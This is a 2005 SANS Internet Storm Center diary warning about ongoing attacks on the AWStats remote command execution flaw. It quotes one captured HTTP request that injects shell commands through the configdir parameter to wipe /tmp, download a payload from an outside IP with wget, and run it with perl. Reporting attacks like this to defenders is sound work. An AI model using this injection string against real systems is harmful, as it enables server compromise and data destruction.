Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: AWSTATS SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
AWSTATS
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  Its all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.



Lorna

165 Posts
ISC Handler
Sep 27th 2005

Sign Up for Free or Log In to start participating in the conversation!